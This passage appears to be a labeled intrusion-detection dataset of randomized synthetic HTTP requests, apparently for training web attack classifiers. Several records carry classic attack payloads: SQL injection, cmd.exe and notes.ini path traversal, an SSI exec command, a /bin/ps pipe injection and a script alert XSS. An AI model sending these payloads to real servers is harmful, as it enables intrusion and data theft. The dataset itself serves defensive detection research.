Last-Modified: Fri, 18 Sep 09 22:14:03 UTC
Host: www.eipo3E.de:6235
Connection: bpsdU
Accept: */*
Accept-Charset: iso-2022-jp, iso-8859-8
Accept-Encoding: identity, deflate
Accept-Language: mai-g0, 7em-r, etudEGn-2;q=0.7, bVh-eilsee;q=0.3, nlrs-delnt9;q=0.4
Cache-Control: 75=taua4hhy
Client-ip: 221.158.6.21
Cookie: vnediOeAtocwwes=860649;ccinsertz1B9bodyxSx=)2w 7ieNb ~
Cookie2: $Version="965"
Date: Tue, 23 Jan 07 04:08:20 GMT
ETag: W/"6wYRe7NHXfdKLFK"
Expect: maEbbf
From: 8raL@hudstis9.fr
If-Modified-Since: Fri, 01 Sep 06 24:59:04 GMT
If-Unmodified-Since: Mon, 02 Feb 04 11:56:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 271
MIME-Version: 5.5
Pragma: xjtueY='Noa3a2d'
Proxy-Authorization: NTLM aTVjZGF0c1NkdG5yemVpd2xmVGVUOGVtbzdMaHB3aW5zZWV0ZWlhcnJhcmVleWE=
Authorization: Basic eHJlZWVJOnNuc2Ry
Range: 229-94,-0,-455
Referer: /sojo/eeYul1Ro/nuuhratt/rt1aan0.nsf
TE: deflate;q=0.9,trailers,gzip
Trailer: Upgrade
User-Agent: rsr3Naeil5ngcn5Hoa
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: FTP/5.1 www.dnnos.shtml, 0.6 116.127.229.75, 7.1 209.215.231.40:80
Transfer-Encoding: compress
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 111 www.Ieeee3e.gif "edowgieoaEca" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

islh1mfen=eR1&.-nodeyz4kPq=rM8W_aOE&thfbwwiot=aa5aewteeaei1Tna&li7kgdChlT=111224014&BJV@=5256&dtkzF4RmQAJR='   or   id    in (     select     *  from   user_db )&uhr3a=biei&nE31=lscofe&u8a9--Sb-P=hGtHee1aOtdnnelocation

End - Id: 41500
Start - Id: 43809
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.tmnrefw.fr:98416
Connection: yopeneWt
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=918
Client-ip: 117.85.13.55
Cookie: yimsdlhxkiip=tH5mtVER;lteseemhrsutu=0250;DCJDS@qfuF1J=iK-Dz@x4aca
Cookie2: $Version="9"
Date: Fri, 11 May 07 04:15:46 GMT
ETag: W/"ZWarviPtT3Lux5IR2"
Expect: emsa=eAit
From: uZkpt@nesht4Iih.ch
If-Modified-Since: Mon, 04 Jan 10 02:16:34 CET
If-Unmodified-Since: Fri, 10 Jun 05 21:26:02 UTC
If-Match: "useCRTuO9zDJi-dYAQ"
If-None-Match: "coV8IVwYjBxRDjgA"
If-Range: Tue, 06 Apr 04 13:52:08 GMT
Max-Forwards: 113
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: ohtI Fgiueot=04Bshd
Range: 904036-,02113-35,44499-
Referer: http://www.e5rRSti.com/Ssamruzt.php3
TE: trailers,chunked
Trailer: Accept-Charset
User-Agent: fAdxexrei (tvU9H4pN; ezNkyp1MY; oDLuOlDZ0w)
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 057x9927
Via: 3.1 7.18.27.109
Transfer-Encoding: identity
Upgrade: eprO5e/8.0, stnNLn/3.7, rEev/8.9
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 73.32.142.166
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43809
Start - Id: 25399
class: Valid
GET /erhh28hi5.tiff?heoe3foe=4170&hian4t=867&eoe=rSaaei%3B4cH&5bwRhAxKc=like&6ydl=7_KKuq8D2wd&EfcdS0fCCall1K=fttxN5ZhsCd HTTP/1.0
Host: www.epegQ1ee9.de
Connection: close
Accept: text/xml;q=0.7, image/*, image/*
Accept-Charset: iso-8859-1;q=0.1, ks_c_5601-1987;q=0.4, cp-936;q=0.2, windows-1257;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 249.125.214.129
Cookie: osa=549452;hpn=7Yd;8t9weos=noder;FzuusrVtLI8@Yc=pWDm.l.;cDsOreoo3sjhu=a5sVLA3-dwjC
Cookie2: $Version="6"
Date: Sat, 19 Apr 08 23:26:25 GMT
ETag: "7@6wB8fqot3FBS2s4"
Expect: 73etn
From: 3iWello@exErc9n.net
If-Modified-Since: Thu, 29 Sep 05 17:42:13 GMT
If-Unmodified-Since: Mon, 25 Jun 07 21:31:22 CET
If-Match: "C4YEjhrnOWJCJrQ"
If-None-Match: "Ghm1XELen.u7yCVv"
If-Range: Mon, 30 Nov 09 17:18:19 CET
Max-Forwards: 2698
MIME-Version: 9.0
Pragma: 0np='emoynF'
Proxy-Authorization: Digest nc=8F5b74AF
Authorization: Basic anhiZHNjOmxyYWtodG9l
Range: 45959-733934,23738-377,80109-
Referer: http://Z0md94sy.de/ta8nlere/g5Ohg/g5d7r.mdb
TE: trailers
Trailer: Accept
User-Agent: Mozilla/0.0 (compatible; Hsf4og; Win98; tetngotth; weEhlHHb; witcoi)
UA-CPU: x86
UA-Disp: 071,871,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 407x092
Via: HTTP/9.1 98.226.156.104:017
Transfer-Encoding: identity
Upgrade: dconw/9.2, 6se8ec/0.0, ent6/3.0
Warning: 569 www.t4X4iede.htm "7eueo" "Fri, 30 Apr 10 03:41:56 CET"
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 06104
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25399
Start - Id: 5688
class: Valid
POST /Xt3Uroilenaf/tDoeeex.php? HTTP/1.0
Content-Length: 109
Content-Language: ki,y9nu
Content-Encoding: identity
Content-Location: http://oflehi.gov/r6rniwhn/hNpez0Wa/GssUgs.php3
Content-MD5: cm5hY29icG5iZTllZGRpNA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Apr 04 06:27:47 GMT
Last-Modified: Sun, 14 Jan 07 08:26:32 GMT
Host: www.ienioH.be
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 66.85.212.245
Cookie: sen=483
Cookie2: $Version="84"
Date: Mon, 26 Apr 10 17:17:20 CET
ETag: "gA-VXXIIO8mh8_lp"
Expect: dne9lee=e3Yttnj
From: jdYeaesr@naae.de
If-Modified-Since: Fri, 03 Jul 09 23:00:11 GMT
If-Unmodified-Since: Thu, 20 May 04 16:24:13 GMT
If-Match: "TbUQBjwn-v-MZb4mHy"
If-None-Match: "yZiIFTe3epyA-Hha5"
If-Range: *
Max-Forwards: 9
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: 5emer ephane=n6oq
Authorization: Digest qop=iaLnL0
Range: 2179-017332,977-12
Referer: http://www.hAns.be/eto3x/weheeoh/woga/ekJmp/aennoo.jpeg
TE: trailers,trailers,gzip
Trailer: Accept-Encoding
User-Agent: wp2nmhavediu3U
UA-CPU: PowerPC
UA-Disp: 1912,4963,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 327x1132
Via: FTP/3.1 9.82.135.101, HTTP/6.5 www.sw1eec.shtml, HTTP/5.0 64.179.72.207
Transfer-Encoding: gzip
Upgrade: roUhpa/5.9, slqpF/4.7, scIo/2.0
Warning: 685 www.kmofeyj.css "nttltitwzunoNm" 
X-Forwarded-For: 161.194.150.26
X-Serial-Number: 7835393170
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

kEz9NW=bxJEcF&t2o=2776&62abhoers=anupdatetp&anshaoot=7&tt6cs=46329&o03Efns=s))acceptEthej&Rseo8b=26484532

End - Id: 5688
Start - Id: 36230
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.0
Host: www.wnn1ToSoru.gov
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce, windows-874, windows-1253;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 58.131.95.224
Cookie: x0dZLI1J=dknMuRVCjq
Cookie2: $Version="298"
Date: Thu, 09 Dec 04 22:07:31 GMT
ETag: "HNKW6sLk9FvzbJhDh2r"
Expect: 100-continue
From: 06n1ooo@Nm7tui.gov
If-Modified-Since: Sun, 13 Sep 09 15:16:07 CET
If-Unmodified-Since: Mon, 15 Jun 09 21:46:55 CET
If-Match: "KF@Qh6Npq.Dbhdld7V"
If-None-Match: "mOW7ByXsLOXWUNwr6"
If-Range: Wed, 27 Aug 08 15:01:17 CET
Max-Forwards: 717
MIME-Version: 9.7
Pragma: sDooBra=gs
Proxy-Authorization: Basic YXVkY2VyeDo4U2Ft
Authorization: NTLM aGlyc2ltcnVhbWlhd2FSZWNwdXlzZFVuaXNvaWVpZXR0b2JpbmxlZUQ=
Range: 183-
Referer: http://ehel.it/e1l7/oieud/sief/nitci0o/Aumiea9.swf
TE: trailers
Trailer: Accept-Language
User-Agent: psamDy (rm7.midt; kCjOrul; tg0n3KWy)
UA-CPU: MIPS
UA-Disp: 399,5892,8
UA-OS: Solaris
Via: HTTP/8.1 www.hiQs.shtml
Transfer-Encoding: wco0ln; tmumx=othb
Upgrade: eEi/2.2, aafe/8.5, gceaso/0.6, aWa/4.3, tiau/5.9
X-Forwarded-For: 190.138.69.239
X-Serial-Number: 779670420209
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36230
Start - Id: 17429
class: Valid
GET /ree5tltbnDtfNe8oaozs/ttU/orenanaoes/z4LscriptP7C/ncds2iLoyd3v/nZUGDjGW013.css?anbHdnrtee=oolhavingc&qmlewa=s%3E%5Bmcot&tnph5eoZt6=raEeNwlejti&2q1npi=hT&r3tfatRlo=neVrmiqeohttprtz&et=7097488&ndesdolucew1un=Iseeopt&rmdstxasuier=dBttacS%40&ahmqotptlblw=za6raNx&Ssh=70&bfecx=ifln9nlj&teZcOsset=35&wMutuaitiahuOmw=lzBg HTTP/1.1
Host: 223.188.250.135
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: alhgn-dhiadI;q=0.8
Cache-Control: no-cache
Client-ip: 180.62.192.17
Cookie: agumpetsele=9053;@mIaDOUMNV=hoeopt;asbkl=ezs3bdre
Cookie2: $Version="13"
Date: Sat, 18 Feb 06 18:39:11 GMT
ETag: W/"UjpexIKDL_kDBAvHG"
Expect: eeOjeim=shOr;el0lberd=Lrnleij
From: asobeo@yaOtdneg.de
If-Modified-Since: Sat, 14 Jan 06 02:46:44 UTC
If-Unmodified-Since: Tue, 01 Dec 09 12:42:33 GMT
If-Match: *
If-None-Match: "nhci.t773B.ZUxHhfK"
If-Range: Wed, 01 Oct 08 18:53:09 CET
Max-Forwards: 359
MIME-Version: 8.5
Pragma: b='d'
Proxy-Authorization: Basic ZGVDb09pMDplbmRnY3Q=
Authorization: Basic d25pZzpycmlu
Range: 8-
Referer: http://trun.uk/u7at1ez/tpcaHe.png
TE: trailers,chunked;q=0.6,trailers
Trailer: Trailer
User-Agent: tsevnh63/3.4.2
UA-CPU: MIPS
UA-Disp: 113,258,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 769x9384
Via: oog/5.4 174.94.51.196, 1.3 www.hatno.jpeg, HTTP/2.9 www.gSeoencc.js
Transfer-Encoding: deflate
Upgrade: tnn/6.0, dhp2e/7.9, 7eo/4.5, 6ei8oh/4.0
Warning: 682 www.8mri.png "1onheHntbcn" "Fri, 11 Dec 09 19:10:46 CET"
X-Forwarded-For: 29.239.233.138
X-Serial-Number: 891452454
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17429
Start - Id: 3624
class: Valid
GET /ietiAmct/iW2v/jJdertwgsigdeien/Jo1passthru/accept8n9GACHXn46/euX.@jyO.cfm?sonqvasenot=mW3SVITRq&mSsero=Alt4&dWBmetatelnet=mkdktiehIh&2uitgHsyroxR=7&aFgheiereilo=ec2sq7om&I3Sc=c3ga7&CmetakinJ=rno&cinput5VCnc.h=1epyIechocrds+smeiowget HTTP/1.0
Host: www.cdvtir.it
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: us-ascii;q=0.0, koi8
Accept-Encoding: 
Accept-Language: *
Cache-Control: sAc9So=le
Client-ip: 135.91.161.35
Cookie: IkekodIwst=oat htes< eousrt5i;ciamoeoegwveae=ntc9ea;5Wxix=<a~xlus
Cookie2: $Version="387"
Date: Wed, 06 Aug 08 07:00:16 CET
ETag: W/"8wNwJwg8pPZwh0Vq"
Expect: ttbs=Iammcyan;ehvTg=Btegrha
From: wunn@neo1eimeb.it
If-Modified-Since: Sun, 01 Mar 09 05:56:17 UTC
If-Unmodified-Since: Fri, 18 Aug 06 12:25:42 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 19 Jan 09 07:40:22 CET
Max-Forwards: 72
MIME-Version: 9.8
Pragma: c0='ssci'
Proxy-Authorization: hgtwia lih5bE=ilsi
Authorization: Basic eXMybmE4bTplb29oaWw=
Range: -66041,943-,-24
Referer: http://www.52nyt.fr/ifwif5A/olle/nfss/5fhamnt/TEvZac.mspx
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.7 (Machintosh; U; PPC Mac OS X 9.7; cn-cz; rv:4.3.1) Gecko/46124080
UA-CPU: Sparc
UA-Disp: 8239,236,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 945x5264
Via: 99e0a/1.8 www.eahoti.jpg:6433, FTP/5.8 21.91.87.112, 0.4 187.167.9.163
Transfer-Encoding: compress
Upgrade: decg/1.7
Warning: 794 www.dlUteCja.htm "intmTihasyncs7wBlnT" "Sun, 26 Feb 06 19:18:11 UTC"
X-Forwarded-For: 187.205.8.164
X-Serial-Number: 98641034
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3624
Start - Id: 30254
class: Valid
GET /shpWhaj-3A2qKx6u7L/sv/sTDwJH251-5U0.jpeg?ehbcrtuaehe=e&bpXSLaaccept=rpwmEWt5Q96&Tv_rmL=ootmxo%5D+vqrtxhcif&sntno=t7iframelnnld%2BA7xobjectadocumentelt HTTP/1.0
Host: www.osiepuaxo.uk
Connection: adIj
Accept: image/jpeg, text/*, image/gif;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: nh='1cnt'
Client-ip: 0.206.225.217
Cookie: eeeesnrd=tntwoseeene3c;ntsTs3aOhnnos=nnceqnlfraaaup;stlleie=ceyoktnomvl
Cookie2: $Version="71"
Date: Tue, 29 Jun 04 06:35:11 GMT
ETag: "q4IL6nQT8JnrD.QqB"
Expect: 100-continue
From: OtuSewg@hqerotci.biz
If-Modified-Since: Mon, 12 Jul 04 09:09:20 CET
If-Unmodified-Since: Fri, 28 Jul 06 23:06:47 CET
If-Match: "VKw4GijKiOCZBWOYL"
If-None-Match: "QT.T74WuwXjuAAz3utZg"
If-Range: Sun, 28 Feb 10 07:28:45 GMT
Max-Forwards: 68
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic dGVyYWVleDppV29zbw==
Range: 32-
Referer: /dmdmdi/ag1n/6aroeaqt.htm
TE: gzip;q=0.5
Trailer: Accept-Language
User-Agent: 1rxctay
UA-CPU: StrongARM
UA-Disp: 790,434,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2607x1931
Via: 2.8 www.3dlaaftc.shtml
Transfer-Encoding: identity
Upgrade: 92ti/2.3, helqbf/3.9, e7crte/0.3, xhgFid/0.0, a5e/8.9
Warning: 129 www.4od57o.jpeg "yOsa6fhl9hr" "Tue, 17 Jul 07 20:05:50 UTC"
X-Forwarded-For: 204.99.102.221
X-Serial-Number: 234250547666615279
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30254
Start - Id: 40277
class: SSI
GET /dXYjoF/ov@Oy/oZPeAV4ZiJqno087p/i1a8tml2OEeuw/abcsreucel6shZeeA/oiS3okeoX/tfsMyg2nDRgedt/G4MmLQRQRDZKYQ2/eenz.bin?1BzsjSoukss=cn&zksrhlnscnNii2=6902923&yc=eOptImaapLe&ebas=%3C%21--++++%23exec++++cmd%3D%22c%3A%5Cprogra%7E1%5Capc3%5Cis%5CsaotNnwe.exe++d%3A%5Cjlef8hzeAw%5Cwww.onch.org%5CItae%5Cdatabase.mdb++%2Fx++exporttofoxpro%22--%3E HTTP/1.1
Host: 59.18.131.47
Connection: lue2f
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 13.81.33.126
Cookie: uihp=%;ele0onAsa1alsu=eIuE~window.openod tto3execowanxaccept;AwcsAivoalte=4115574183;pdvaLetooseza=opmntshtpinOae
Cookie2: $Version="114"
Date: Sat, 26 Dec 09 20:42:54 CET
ETag: W/"@moOyA0qZvFXp@I"
Expect: eAae
From: sinl@n3biht.ch
If-Modified-Since: Sat, 05 Jun 04 21:43:24 GMT
If-Unmodified-Since: Sat, 22 Oct 05 03:31:29 GMT
If-Match: *
If-None-Match: "ZptszONkLvdLgvg"
If-Range: *
Max-Forwards: 31
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Tanare rhil=drTtinN
Authorization: Digest nc=4FCdffE7
Range: 1030-
Referer: http://www.nhAfnysm.it/slpeosr/ktAe.mpg
TE: trailers,deflate,trailers
Trailer: Authorization
User-Agent: Mozilla/5.2 (X11; U; Unix 7.7; hj-ue; rv:9.9.5) Gecko/88069235
UA-CPU: MIPS
UA-Disp: 7013,7944,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6936x3425
Via: 5.1 www.eitose.png
Transfer-Encoding: gzip
Upgrade: shUaoo/4.0, eat/0.9, y0aio/2.5, enluo/1.0, siaeN/8.6
Warning: 487 www.1qtdgidu.tiff "h7idno2aalutGrerznAt" "Sun, 05 Mar 06 10:34:02 UTC"
X-Forwarded-For: 147.185.144.226
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40277
Start - Id: 9271
class: Valid
GET /z1UBcopyJ/0igu1tit/x2VXeEf@/4duta5dihg9m/eibuOs/ScHeiTt1eeadit7oet.jsp?ue2sF9z1=4739&RidX.W=xmluh7Etc4doeH%28p HTTP/1.0
Host: 121.46.212.1
Connection: close
Accept: */*
Accept-Charset: x-mac-ce
Accept-Encoding: compress;q=0.2, identity;q=0.3
Accept-Language: eR-ni, Gese3i-dekU, iasgd-z6
Cache-Control: no-cache
Client-ip: 126.233.178.83
Cookie: -B6winntAyJH=akh;sEsu=00858210;yIIyehahhb6e6=241336
Cookie2: $Version="84"
Date: Wed, 29 Mar 06 06:46:39 CET
ETag: "w.Mt6Okd.XPkWt4Oq"
Expect: vt4hih9=nniom4e
From: vsdit@a9hosdr9ad.fr
If-Modified-Since: Fri, 21 Jan 05 09:57:03 UTC
If-Unmodified-Since: Sun, 11 Nov 07 02:02:38 GMT
If-Match: "3KLyrVoWJnMtexba5uA"
If-None-Match: *
If-Range: "Jg1Dodfy9feXJRK"
Max-Forwards: 0704
MIME-Version: 2.8
Pragma: ni='h'
Proxy-Authorization: Basic cm5saXF0Om05c29i
Authorization: Basic bWNjczpCYTIydGFu
Range: 39-95,-16552
Referer: http://www.tetiz.uk/drndn/ibhoan/a3paep/nt3n0jea/tD0qq5i.jsp
TE: trailers,gzip
Trailer: Expect
User-Agent: Mozilla/6.4 (Windows; U; Windows NT 4.1; ah-kE; rv:7.1.8) Gecko/52305497
UA-CPU: 68000
UA-Disp: 5586,668,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0125x395
Via: 1.5 186.189.40.228
Transfer-Encoding: compress
Upgrade: s7dye7/5.8, orv/6.4, qJoe/0.0, eee6c/2.1, ihs/5.2
Warning: 290 110.110.36.21 "oon7Ni" 
X-Forwarded-For: 215.205.82.248
X-Serial-Number: 378312956268
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9271
Start - Id: 43215
class: OsCommanding
GET /e6EIMBWzwpoio0/stoasne/iUXPMNi1D/5sS9B/lgkTAakv9L6dTK4/1e-b3_X/8fiZ_.XM6zSkzbVu0shH/0eauegal/iT8s1Or7MWnbl/4ehieewi3iolltw/ayjjtah/d90E7EQXkjAy.css?VPkfze=%2Fbin%2Fps%2500+%7C HTTP/1.1
Host: www.ceji.biz
Connection: close
Accept: application/*, audio/*;q=0.0, application/zip
Accept-Charset: *
Accept-Encoding: 
Accept-Language: pi-ecr;q=0.7, j7lyougo-sst, uooa-8eey6oy;q=0.0, iidhLe-u;q=0.6, 5oari-gay;q=0.3
Cache-Control: no-transform
Client-ip: 59.228.253.1
Cookie: 6hdrae7I=4036153164;vmtt=rhl8l';cwWnwbEg=3
Cookie2: $Version="350"
Date: Sun, 21 Nov 04 16:28:16 UTC
ETag: W/"kIs-QqYDbLDJ8MmpxE"
Expect: 100-continue
From: oaiin@sieotlre.cz
If-Modified-Since: Thu, 18 Sep 08 10:08:03 CET
If-Unmodified-Since: Tue, 22 Dec 09 23:08:36 CET
If-Match: "Co1y6Q-2MGuksT2._a0"
If-None-Match: *
If-Range: Wed, 18 Jan 06 20:47:38 CET
Max-Forwards: 702
MIME-Version: 6.7
Pragma: ta=bd
Proxy-Authorization: mfey smnSW=fltvk
Authorization: NTLM eW9ydkRnamhmYnNoam5kZWltdDNlbENvdG9yaGVuaXRIZWhudGhhNnJzb2lTZg==
Range: 2403-,12114-9,53-40810
Referer: http://www.Uihgfakh.gov/Ksdeby/v3st/ajcicfe/oeeac.php3
TE: deflate;q=0.3,gzip,trailers
Trailer: TE
User-Agent: i6mwR6tss2eape
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 967x857
Via: 8.2 www.t5ieord.tiff, 4.8 www.dsasb.tiff, FTP/2.4 3.129.118.127:14711
Transfer-Encoding: lauvse; eychmig=l1athgp
Upgrade: pIh6l/8.2, tEst/3.2
Warning: 931 29.33.161.132:937 "tiriHq" "Sun, 23 Apr 06 11:58:11 UTC"
X-Forwarded-For: 33.3.87.207
X-Serial-Number: 3512760212193
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43215
Start - Id: 46563
class: XSS
GET cgiwrap/<SCRIPT>alert(document.domain)</SCRIPT>? HTTP/1.0
Host: 217.75.188.12
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: koi8;q=0.9, x-mac-japanese, x-mac-roman;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=52288
Client-ip: 236.99.76.50
Cookie: da=0;heP_4F-=rDF5IgfOy;fvbS8=0st=5mqsh558y;smtlleixl=tsncsgg72dHiEeseEx
Cookie2: $Version="190"
Date: Mon, 02 Nov 09 14:59:34 GMT
ETag: W/"r7xvU1ABLhQvujo8d"
Expect: seturnT=oaeb;IrmjE
From: ns7rogjc@npah.it
If-Modified-Since: Sun, 06 May 07 11:16:13 UTC
If-Unmodified-Since: Sat, 30 Jun 07 15:27:46 UTC
If-Match: "k3JWTcMEDBVUR_1KV1"
If-None-Match: "mJg7sXMekWv1O_5P_e1K"
If-Range: Thu, 05 Jul 07 03:58:18 UTC
Max-Forwards: 9055
MIME-Version: 1.3
Pragma: ajyeoi0C=iod
Proxy-Authorization: Digest username="rgww0see"
Authorization: Digest response="Bf1A17Db765F8d2b90ad86d1D0Ca6f27"
Range: 910-120,749-15173
Referer: /iqkpofo/RmesgaF/smoldti0/3s4iU.wmn
TE: deflate,deflate,gzip;q=0.9
Trailer: Pragma
User-Agent: Mozilla/9.5 (compatible; MSIE 9.7; Open BSD i586; viu7maa5t; nhiraq; xvoay3)
UA-CPU: x86
UA-Disp: 161,932,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 309x668
Via: 3.6 174.49.74.183
Transfer-Encoding: gzip
Upgrade: irra/6.5, aec/6.4, reai65/1.7, rTN/8.4, fctm/6.2
Warning: 953 162.158.190.142 "tshTYs" 
X-Forwarded-For: 136.226.21.172
X-Serial-Number: 794611052
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46563
Start - Id: 13076
class: Valid
GET /rBIQ5rL/nR7eUqr3kl7@.css? HTTP/1.1
Host: www.lewN3t1a.biz
Connection: Laihper
Accept: application/postscript;q=0.8, application/*;q=0.9, audio/basic;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: t-4rf, l-fte7, VcmS-iytp, 4gaiscq-aet;q=0.7
Cache-Control: no-cache
Client-ip: 52.90.216.125
Cookie: SfcYOsrjXB.F=rtelnetf7document/8tore;E7fmmrcp=i$8pwglsyDi;O5sE=iwO627;0KAUYHlo=:mtmn/v<htxp2;tat=Nw3eepoe7w fifnt;noitfRmpoeuAg=91487
Cookie2: $Version="333"
Date: Wed, 22 Dec 04 07:41:44 GMT
ETag: W/"v2V@RYlnc_EIBTXD3noE"
Expect: obttpe=aNfr
From: tnhi4hE@9okqw9h.it
If-Modified-Since: Sun, 11 Sep 05 09:16:47 CET
If-Unmodified-Since: Wed, 17 Sep 08 03:23:27 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4756
MIME-Version: 1.2
Pragma: l='reA'
Proxy-Authorization: E3lea ckerR=rgYuo
Authorization: Basic d3RmczY6R3VzNWFpcm8=
Range: 65780-,3-830,6-864
Referer: /eiar2dwa.mpg
TE: gzip,chunked;q=0.5
Trailer: Host
User-Agent: Mozilla/4.8 (Machintosh; U; Mac OS X 6.3; ln-od; rv:3.5.9) Gecko/42449718
UA-CPU: 68000
UA-Disp: 271,129,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 880x583
Via: FTP/4.3 www.naadlloy.tiff, HTTP/7.6 www.rleue.gif, 2.2 79.67.238.145
Transfer-Encoding: gzip
Upgrade: s5iqnh/8.3, kyo/5.0
Warning: 640 www.1louxUcH.gif:02024 "htiLue4k" "Tue, 30 Oct 07 05:54:05 GMT"
X-Forwarded-For: 129.45.112.20
X-Serial-Number: 837041373393858
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 13076
Start - Id: 21381
class: Valid
GET /uI8zb-3l/n5AfgAL/eioir9ertnhfqe/edtotp3eeehuLpots5cr/elfwe2e/la/tWDYP-N5sJBwK/btGXvp/DFUxHs/or/bsDwxnQwW/nxzuct4jhuo18.png? HTTP/1.1
Host: www.pcEerji.gov:80
Connection: 6elhAI
Accept: */*
Accept-Charset: iso-8859-6
Accept-Encoding: 
Accept-Language: hrAfp-dr, axrate-d8iei
Cache-Control: max-stale=5
Client-ip: 129.180.163.192
Cookie: 5Tjmt=109;iL8v1e3=dsu8a
Cookie2: $Version="2"
Date: Sat, 31 Oct 09 10:19:04 UTC
ETag: "NH-4d06ZBYMuVX6"
Expect: faieN
From: 6nzmsEZ@elsd.cz
If-Modified-Since: Wed, 31 Oct 07 13:39:09 UTC
If-Unmodified-Since: Mon, 18 Jan 10 04:59:35 UTC
If-Match: *
If-None-Match: "Rjw.MeQVzIEQ@ZFD"
If-Range: Wed, 28 Sep 05 22:49:45 UTC
Max-Forwards: 5444
MIME-Version: 7.5
Pragma: usn='sifr'
Proxy-Authorization: Digest opaque="feou"
Authorization: lbqPj 8buhc=p6raoder
Range: -5
Referer: /fnXenr/Csdtdycd/osoHas.sh
TE: chunked;q=0.2
Trailer: Max-Forwards
User-Agent: eeis0t (haUCE7i; aoyLOK9X6; a@JoaB; 21enjjzBZ)
UA-CPU: MIPS
UA-Disp: 0248,8478,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 965x768
Via: 1.8 www.dAshaejg.htm:40623
Transfer-Encoding: identity
Upgrade: 1demst/6.3, lst/8.2, zrawv/9.2, 8BteE/4.8, vnu/6.7
Warning: 043 24.229.27.123 "ortNea7pt" 
X-Forwarded-For: 86.182.5.47
X-Serial-Number: 2418413
----: ----------
~~~~~: ~~~~~~~~~~

null

End - Id: 21381
Start - Id: 42845
class: OsCommanding
